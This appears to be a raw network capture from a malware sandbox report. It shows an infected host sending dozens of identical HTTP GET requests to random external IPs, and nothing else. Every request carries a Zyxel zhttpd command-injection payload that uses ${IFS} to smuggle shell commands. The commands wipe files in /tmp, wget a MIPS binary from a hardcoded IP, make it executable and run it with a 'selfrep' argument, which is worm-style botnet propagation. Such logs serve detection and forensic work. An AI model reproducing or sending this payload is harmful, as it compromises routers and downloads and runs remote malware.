                                        Jan 14, 2024 16:18:49.566601992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5592192.168.2.135147675.52.24.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566637993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5593192.168.2.1353338112.233.219.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566684008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5594192.168.2.135332418.104.131.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566718102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5595192.168.2.1349168156.122.156.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566759109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5596192.168.2.135761232.174.152.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566812038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5597192.168.2.1337780148.252.239.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566843033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5598192.168.2.1357458219.26.135.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566860914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5599192.168.2.1360302207.242.112.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566907883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5600192.168.2.1339848211.109.61.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566941977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5601192.168.2.1347826219.254.41.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566991091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5602192.168.2.1335624114.77.179.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567029953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5603192.168.2.135183297.47.161.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567070961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5604192.168.2.1354980153.16.14.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567126036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5605192.168.2.1357168156.98.55.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567152023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5606192.168.2.1352934178.25.178.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567182064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5607192.168.2.1347262156.166.174.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567254066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5608192.168.2.1357792121.119.119.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567284107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5609192.168.2.1356574128.24.23.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567312956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5610192.168.2.1343888114.208.13.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567353010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5611192.168.2.135806676.147.237.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567409039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5612192.168.2.1353372125.94.85.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567435026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5613192.168.2.1360606152.245.227.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567490101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5614192.168.2.1343880143.61.49.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567532063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5615192.168.2.133820873.172.1.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567532063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5616192.168.2.134119063.204.79.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567569017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5617192.168.2.1352254199.184.105.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567594051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5618192.168.2.135154298.244.128.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567629099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5619192.168.2.135061412.212.110.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567677021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5620192.168.2.135348091.159.48.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567732096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5621192.168.2.1338896121.173.26.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567764044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5622192.168.2.135283493.100.207.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567816019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5623192.168.2.1355074204.51.50.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567856073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5624192.168.2.1354204149.233.43.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567909002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5625192.168.2.1340088165.127.51.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.567965984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5626192.168.2.1352558163.60.35.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568001986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5627192.168.2.1335986223.16.64.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568053007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5628192.168.2.1346728123.119.195.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568080902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5629192.168.2.1342422187.50.173.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568113089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5630192.168.2.1354978200.190.35.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568145037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5631192.168.2.1346186162.174.207.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568181992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5632192.168.2.1347972123.211.179.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568217039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5633192.168.2.1357362151.234.233.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568274021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5634192.168.2.1348812129.129.81.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568305969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5635192.168.2.1352856166.69.47.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568326950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5636192.168.2.1348158212.167.253.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568362951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5637192.168.2.1348168118.189.243.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568408012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5638192.168.2.133638019.2.90.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568449020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5639192.168.2.1359180171.234.164.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568492889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5640192.168.2.133353266.105.142.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568552017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5641192.168.2.1339072116.117.53.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568602085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5642192.168.2.133345498.148.59.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568625927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5643192.168.2.1348820113.11.69.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568666935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5644192.168.2.135371036.2.119.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.568707943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5645192.168.2.133935452.100.87.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.571937084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5646192.168.2.1343196119.1.39.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573045015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5647192.168.2.133830462.234.153.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573076963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5648192.168.2.1354902182.211.32.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573118925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5649192.168.2.133624898.132.202.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573159933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5650192.168.2.1359960145.82.11.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573185921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5651192.168.2.1355302196.1.151.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573215961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5652192.168.2.1349928142.233.38.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573247910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5653192.168.2.136013671.157.17.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573299885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5654192.168.2.1340806163.210.172.116443
                                        TimestampBytes transferredDirectionData
